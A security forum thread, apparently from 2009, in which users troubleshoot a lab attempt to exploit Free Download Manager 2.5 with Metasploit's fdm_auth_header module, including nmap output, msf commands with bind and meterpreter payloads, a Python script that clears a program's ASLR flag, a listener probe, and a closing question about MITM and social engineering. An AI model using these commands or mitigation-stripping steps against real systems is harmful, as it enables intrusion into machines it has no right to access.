As I have a fully patched Vista box, I was trying to make it vulnerable. My idea was to install Free Download Manager 2.5 Build 758 on it, so that I can exploit it from my BT3/BT4b box. Obviously, I am using the fdm_auth_header exploit. As payload, I'm happy to get a shell, although a meterpreter session is preferred. I tried several payloads including meterpreter, reverse meterpreter and bind tcp, but no luck yet. So, just wondering whether anyone has had better experience... Thanks a lot for your time.
If you can't explain it simply, you don't understand it well enough -- Albert Einstein
Maybe go for a different exploit? Or try it out on a XP box and see if you have issues with the exploit itself or if there might be an issue with Vista.
Tiocfaidh ár lá
Thanks KMDave for the reply. I think fdm_auth_header is the exploit that should work against the download manager. This one clearly says: "This module exploits a stack overflow in Free Download Manager Remote Control 2.5 Build 758. When sending a specially crafted Authorization header, an attacker may be able to execute arbitrary code."
I'll try again tonight with Vista, after disabling AV & firewall.
At this moment, I don't have an XP box with me... If someone has a go with XP, that would be great. Any newbie? PM me please if interested, I'll guide you through. Cheers guys
Remember, Vista has Address Space Randomization, and if it's enabled in FDM you're screwed... You can disable it in the FDM exe with a hex editor; it's a simple change (I don't remember the address, but you can research the topic).
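The "enabled in FDM" part of the post above is the DYNAMICBASE bit (0x0040) in the PE optional header's DllCharacteristics field: on Vista, ASLR relocates an executable's own image only when the image opts in with that bit, and the hex-editor change being described is clearing it. The following is an added example, not code from the thread or from FDM: a Python check that reads that field from any PE file and, on a lab copy you control, clears it. The stub PE header it builds is constructed for the demonstration and is not the FDM binary. Caveat: Vista relocates system DLLs regardless of this bit, so clearing it only helps an exploit whose return address lies inside the application's own image; the thread does not say where fdm_auth_header's return address points.

```python
import struct
import sys

# PE optional header DllCharacteristics bits (Vista-era opt-in mitigations)
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # ASLR opt-in (/DYNAMICBASE)
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # DEP opt-in (/NXCOMPAT), shown for context


def _dllchar_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.DllCharacteristics.

    Layout: 'MZ' header -> e_lfanew at 0x3C -> 'PE\\0\\0' -> 20-byte COFF header
    -> optional header. DllCharacteristics is 70 bytes into the optional header
    for both PE32 (magic 0x10b) and PE32+ (magic 0x20b).
    """
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    opt_hdr = e_lfanew + 4 + 20
    magic = struct.unpack_from("<H", data, opt_hdr)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    return opt_hdr + 70


def dll_characteristics(data: bytes) -> int:
    """Raw 16-bit DllCharacteristics value."""
    return struct.unpack_from("<H", data, _dllchar_offset(data))[0]


def aslr_opted_in(data: bytes) -> bool:
    """True if the image asks Vista (and later) to randomize its base address."""
    return bool(dll_characteristics(data) & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)


def clear_dynamic_base(data: bytes) -> bytes:
    """Return a copy with DYNAMICBASE cleared: the hex-editor change from the post.

    Only for a lab copy you own; the result is a modified executable.
    """
    off = _dllchar_offset(data)
    flags = dll_characteristics(data) & ~IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
    return data[:off] + struct.pack("<H", flags & 0xFFFF) + data[off + 2:]


def build_stub_pe(dll_flags: int) -> bytes:
    """Constructed minimal PE32 header (not FDM, not runnable) that the parser accepts."""
    e_lfanew = 0x80
    mz = bytearray(e_lfanew)
    mz[:2] = b"MZ"
    struct.pack_into("<I", mz, 0x3C, e_lfanew)
    # COFF header: Machine=i386, 0 sections, no symbols, 224-byte optional header
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 magic
    struct.pack_into("<H", opt, 68, 2)          # IMAGE_SUBSYSTEM_WINDOWS_GUI
    struct.pack_into("<H", opt, 70, dll_flags)  # DllCharacteristics
    return bytes(mz) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    # usage: python pe_aslr_check.py [path-to-exe]; with no path, checks the stub
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            image = fh.read()
    else:
        image = build_stub_pe(IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
    print("DllCharacteristics = 0x%04x, ASLR opt-in: %s"
          % (dll_characteristics(image), aslr_opted_in(image)))
```

Run it against the installed FDM executable to see whether the flag is set at all before bothering with a hex editor; a 2008-era build may never have opted in, in which case ASLR is not what is blocking the exploit.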
Update: Tried with Vista, after disabling AV & firewall: nothing happens. A Nessus scan, as well, doesn't find any vulnerability.
Update 2: Managed to get hold of an (unpatched) XP box, will try there.
Now I'm really stuck, must be missing something completely. Mind that there is no service pack installed on the XP box. Free Download Manager 2.5 Build 758 is running on the box. Here is the nmap output from the attacker (BT4b):

root@bt:~# nmap -sV -O 192.168.1.5

Starting Nmap 4.68 ( http://nmap.org ) at 2009-05-26 18:16 EDT
Interesting ports on 192.168.1.5:
Not shown: 1712 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open  msrpc        Microsoft Windows RPC
5000/tcp open  upnp         Microsoft Windows UPnP
MAC Address: 00:1F:1F:08:8E:AE (Edimax Technology Co.)
Device type: general purpose
Running: Microsoft Windows 2000
OS details: Microsoft Windows 2000 SP0/SP2/SP4 or Windows XP SP0/SP1, Microsoft Windows 2000 SP1, Microsoft Windows 2000 SP2
Network Distance: 1 hop
Service Info: OS: Windows

Host script results:
|_ Discover OS Version over NetBIOS and SMB: Windows XP

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.65 seconds

Here is the unsuccessful exploitation:

msf > use windows/http/fdm_auth_header
msf exploit(fdm_auth_header) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(fdm_auth_header) > set rhost 192.168.1.5
rhost => 192.168.1.5
msf exploit(fdm_auth_header) > exploit

[*] Trying target Free Download Manager 2.5 Build 758...
[*] Started bind handler
[-] Exploit failed: The connection was refused by the remote host (192.168.1.5:80).
[*] Exploit completed, but no session was created.

Tried meterpreter payload:

msf exploit(fdm_auth_header) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(fdm_auth_header) > exploit

[*] Trying target Free Download Manager 2.5 Build 758...
[*] Started bind handler
[-] Exploit failed: The connection was refused by the remote host (192.168.1.5:80).
[*] Exploit completed, but no session was created.

Any idea? What I can see is port 80 is not open.
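The msf output in the post above fails before any payload is sent: the bind handler starts, then the module's TCP connect to 192.168.1.5:80 is refused, which agrees with the nmap scan that lists no port 80. fdm_auth_header talks to the FDM Remote Control web listener, so the first thing to confirm is that something is listening on that port and answering HTTP with a Basic challenge. The following is an added example, not code from the thread or from the Metasploit module: a small Python pre-flight probe that distinguishes "refused" (nothing listening, what msf reported) from "timeout" (filtered) and from a live HTTP listener, and reports the WWW-Authenticate challenge when one comes back. The stub listener in it is a constructed stand-in for demonstration, not FDM, and has no overflow.

```python
import base64
import http.server
import socket
import socketserver
import threading


def probe_http_listener(host: str, port: int, timeout: float = 3.0) -> dict:
    """Pre-flight for an exploit aimed at an HTTP listener (the module's RPORT, 80).

    Returns {'state': 'refused' | 'timeout' | 'error' | 'no-http' | 'http'}; for
    'http' it also carries the status line and any WWW-Authenticate challenge,
    which a Basic-auth protected remote-control page should send back.
    """
    creds = base64.b64encode(b"probe:probe").decode()  # well-formed, harmless header
    request = ("GET / HTTP/1.0\r\nHost: %s\r\nAuthorization: Basic %s\r\n\r\n"
               % (host, creds)).encode()
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            s.sendall(request)
            data = b""
            while len(data) < 4096:
                chunk = s.recv(1024)
                if not chunk:
                    break
                data += chunk
    except ConnectionRefusedError:
        return {"state": "refused"}      # what msf reported for 192.168.1.5:80
    except socket.timeout:
        return {"state": "timeout"}      # filtered, or a listener that never answers
    except OSError as exc:
        return {"state": "error", "detail": str(exc)}
    if not data.startswith(b"HTTP/"):
        return {"state": "no-http", "banner": data[:64]}
    head = data.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    result = {"state": "http", "status": lines[0]}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "www-authenticate":
            result["www_authenticate"] = value.strip()
    return result


class _BasicAuthStub(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for a Basic-auth protected listener (not FDM)."""

    def do_GET(self):
        self.send_response(401)
        self.send_header("WWW-Authenticate", 'Basic realm="stub"')
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):
        pass  # keep the demo quiet


def start_stub_listener():
    """Start the stub on a free loopback port; returns (server, port)."""
    srv = socketserver.TCPServer(("127.0.0.1", 0), _BasicAuthStub)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def free_loopback_port() -> int:
    """A loopback port with nothing listening, to reproduce the 'refused' path."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    srv, port = start_stub_listener()
    print("nothing listening:", probe_http_listener("127.0.0.1", free_loopback_port()))
    print("stub listener:    ", probe_http_listener("127.0.0.1", port))
    srv.shutdown()
    srv.server_close()
```

Against the lab target, `probe_http_listener("192.168.1.5", 80)` returning `refused` means the module never gets to send its Authorization header, so changing payloads cannot help; the listener has to be up first, and only an `http` result with a `Basic` challenge shows a server that parses the header the module targets.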
Maybe the download manager has to download the file from the attacking machine? It usually won't sit and listen for incoming connections.
It is the same as with, for instance, the QuickTime exploit: the victim has to open a specific file or URL in order for an exploit to be sent to him.
So, should I use a MITM attack & SE (I mean, if it was the real world) to make the XP box download something from the attacker?